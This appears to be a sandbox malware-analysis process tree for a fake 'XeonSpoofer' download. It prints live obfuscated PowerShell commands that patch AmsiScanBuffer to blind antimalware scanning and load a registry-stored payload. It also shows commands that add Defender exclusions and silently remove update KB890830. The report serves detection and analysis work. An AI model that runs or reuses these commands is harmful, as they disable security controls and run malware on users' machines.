$_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+''+'o'+'s'+[Char](111)+''+'f'+'t'+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+'v'+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+'s'+'');$agSNfurqyFkhSX=$pUcfPEsJceBvU.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+'rocA'+[Char](100)+''+[Char](100)+''+[Char](114)+'es'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+''+[Char](44)+'St'+[Char](97)+''+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$GVIqUNKbwHlvNTCeoUC=nBomMFklgOPf @([String])([IntPtr]);$pVMuyEhyfPHryzSVnbFbSV=nBomMFklgOPf @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZROQekjHNnj=$pUcfPEsJceBvU.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+'u'+''+'l'+''+[Char](101)+'H'+[Char](97)+''+[Char](110)+'d'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+'n'+[Char](101)+'l3'+'2'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$qwvDMOqSmOevRz=$agSNfurqyFkhSX.Invoke($Null,@([Object]$ZROQekjHNnj,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+'r'+'y'+''+[Char](65)+'')));$RnqDwYsNZGxMFAOFI=$agSNfurqyFkhSX.Invoke($Null,@([Object]$ZROQekjHNnj,[Object](''+[Char](86)+'i'+'r'+''+[Char](116)+''+[Char](117)+'a'+'l'+''+[Char](80)+'r'+[Char](111)+''+[Char](116)+''+'e'+'c'+'t'+'')));$xPSOOet=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qwvDMOqSmOevRz,$GVIqUNKbwHlvNTCeoUC).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.dl'+[Char](108)+'');$JvprqCCUPCPjYVhpR=$agSNfurqyFkhSX.Invoke($Null,@([Object]$xPSOOet,[Object](''+[Char](65)+''+'m'+''+[Char](115)+'iSc'+'a'+''+'n'+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$BDMiMviAfS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RnqDwYsNZGxMFAOFI,$pVMuyEhyfPHryzSVnbFbSV).Invoke($JvprqCCUPCPjYVhpR,[uint32]8,4,[ref]$BDMiMviAfS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JvprqCCUPCPjYVhpR,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RnqDwYsNZGxMFAOFI,$pVMuyEhyfPHryzSVnbFbSV).Invoke($JvprqCCUPCPjYVhpR,[uint32]8,0x20,[ref]$BDMiMviAfS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+'E'+'').GetValue('d'+[Char](105)+''+[Char](97)+''+'l'+''+[Char](101)+'rs'+'t'+''+[Char](97)+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5612
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5660
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:tPCtZZoRiCvT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZqTWKKEGaRbWPC,[Parameter(Position=1)][Type]$kEJviiUqoH)$HwKrEelNqeA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Ref'+[Char](108)+''+'e'+''+'c'+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+''+'e'+''+'l'+'e'+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+[Char](112)+''+'e'+'',''+[Char](67)+'lass'+[Char](44)+'Pub'+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+'s'+'s'+'',[MulticastDelegate]);$HwKrEelNqeA.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+''+'e'+''+[Char](44)+''+'H'+''+[Char](105)+'de'+'B'+''+[Char](121)+''+'S'+'ig,'+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ZqTWKKEGaRbWPC).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+'e'+''+[Char](100)+'');$HwKrEelNqeA.DefineMethod(''+[Char](73)+'nvok'+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+'l'+'i'+''+'c'+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+'S'+'ig'+[Char](44)+''+[Char](78)+'ew'+[Char](83)+''+'l'+'o'+[Char](116)+''+[Char](44)+'V'+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$kEJviiUqoH,$ZqTWKKEGaRbWPC).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+'i'+'m'+'e'+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+'d'+'');Write-Output $HwKrEelNqeA.CreateType();}$KVUYPmzJfMafC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+'s'+'t'+''+'e'+''+[Char](109)+'.d'+[Char](108)+''+'l'+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+'Wi'+[Char](110)+''+[Char](51)+''+'2'+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+'i'+[Char](118)+''+'e'+'M'+'e'+''+[Char](116)+'ho'+[Char](100)+''+[Char](115)+'');$GQtrlLquXANcjo=$KVUYPmzJfMafC.GetMethod('G'+'e'+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+''+'c'+''+'A'+''+[Char](100)+''+[Char](100)+''+'r'+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+'bli'+[Char](99)+''+[Char](44)+'S'+'t'+'at'+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ANdnlvCWDHzgFRShFBw=tPCtZZoRiCvT @([String])([IntPtr]);$vhOhzIDDKhOlMgwoFGeeZd=tPCtZZoRiCvT @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MnnvgBMiHSJ=$KVUYPmzJfMafC.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+'o'+[Char](100)+''+'u'+''+'l'+'e'+'H'+''+'a'+'n'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+'n'+'e'+''+[Char](108)+''+[Char](51)+''+'2'+'.'+'d'+''+[Char](108)+''+[Char](108)+'')));$CfLaGSVbscXEVj=$GQtrlLquXANcjo.Invoke($Null,@([Object]$MnnvgBMiHSJ,[Object](''+'L'+''+[Char](111)+''+[Char](97)+'d'+[Char](76)+''+[Char](105)+'br'+[Char](97)+''+'r'+'yA')));$QvITrsqqqfVZGQBEb=$GQtrlLquXANcjo.Invoke($Null,@([Object]$MnnvgBMiHSJ,[Object](''+[Char](86)+''+[Char](105)+'r'+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+'o'+'te'+'c'+''+'t'+'')));$JczOetI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CfLaGSVbscXEVj,$ANdnlvCWDHzgFRShFBw).Invoke(''+[Char](97)+''+[Char](109)+'s'+'i'+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'');$rjSMzvJFpICsWkDBw=$GQtrlLquXANcjo.Invoke($Null,@([Object]$JczOetI,[Object](''+[Char](65)+''+[Char](109)+''+'s'+'i'+[Char](83)+''+[Char](99)+'a'+[Char](110)+'B'+[Char](117)+''+'f'+'f'+'e'+''+'r'+'')));$NvqrsRsISC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QvITrsqqqfVZGQBEb,$vhOhzIDDKhOlMgwoFGeeZd).Invoke($rjSMzvJFpICsWkDBw,[uint32]8,4,[ref]$NvqrsRsISC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$rjSMzvJFpICsWkDBw,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QvITrsqqqfVZGQBEb,$vhOhzIDDKhOlMgwoFGeeZd).Invoke($rjSMzvJFpICsWkDBw,[uint32]8,0x20,[ref]$NvqrsRsISC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue('d'+[Char](105)+''+'a'+''+'l'+''+'e'+''+'r'+''+[Char](115)+''+'t'+'ag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:5748
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3048

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1204

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1264

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1340

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1420

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1480
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2968

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1616

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1768

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1836

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1944

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1552

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2192

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
- Drops file in System32 directory
PID:2596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2688

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2704

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2732

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3060

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3120

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
PID:3236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://mediafire.com/file/ujhp1i716ubbtsg/XeonSpooferV1.zip/file
  2⤵
  - Enumerates system info in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:5324
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa95903cb8,0x7ffa95903cc8,0x7ffa95903cd8
    3⤵
    PID:5436
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,7825768967093498113,4850355100235013195,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1936 /prefetch:2
    3⤵
    PID:6024
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1884,7825768967093498113,4850355100235013195,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:772
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1884,7825768967093498113,4850355100235013195,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2808 /prefetch:8
    3⤵
    PID:1760
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,7825768967093498113,4850355100235013195,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
    3⤵
    PID:5548
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,7825768967093498113,4850355100235013195,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
    3⤵
    PID:6116
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,7825768967093498113,4850355100235013195,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1
    3⤵
    PID:2216
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,7825768967093498113,4850355100235013195,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1
    3⤵
    PID:3224
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,7825768967093498113,4850355100235013195,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6220 /prefetch:1
    3⤵
    PID:5852
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,7825768967093498113,4850355100235013195,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:1
    3⤵
    PID:1256
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1884,7825768967093498113,4850355100235013195,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5000 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3796
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,7825768967093498113,4850355100235013195,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4088 /prefetch:1
    3⤵
    PID:1544
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,7825768967093498113,4850355100235013195,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:1
    3⤵
    PID:1548
- - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1884,7825768967093498113,4850355100235013195,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5812 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3924
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,7825768967093498113,4850355100235013195,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6204 /prefetch:1
    3⤵
    PID:1868
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,7825768967093498113,4850355100235013195,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:1
    3⤵
    PID:2096
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,7825768967093498113,4850355100235013195,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1180 /prefetch:1
    3⤵
    PID:2136
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,7825768967093498113,4850355100235013195,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:1
    3⤵
    PID:3208
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,7825768967093498113,4850355100235013195,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6128 /prefetch:1
    3⤵
    PID:2584
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,7825768967093498113,4850355100235013195,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7096 /prefetch:1
    3⤵
    PID:3784
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1884,7825768967093498113,4850355100235013195,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4780 /prefetch:8
    3⤵
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    PID:3112
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,7825768967093498113,4850355100235013195,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5236 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3320
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\LICENSE KEY.txt
  2⤵
  PID:680
- C:\Users\Admin\Desktop\XeonSpoofer.exe
  "C:\Users\Admin\Desktop\XeonSpoofer.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:6080
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAYgBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAYgBxACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcQB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAbQB2ACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5744
- - C:\Users\Admin\AppData\Local\Temp\Root + 2 Minute Start Delay.exe
    "C:\Users\Admin\AppData\Local\Temp\Root + 2 Minute Start Delay.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:3476
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2452
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:4252
    - - C:\Windows\system32\wusa.exe
        
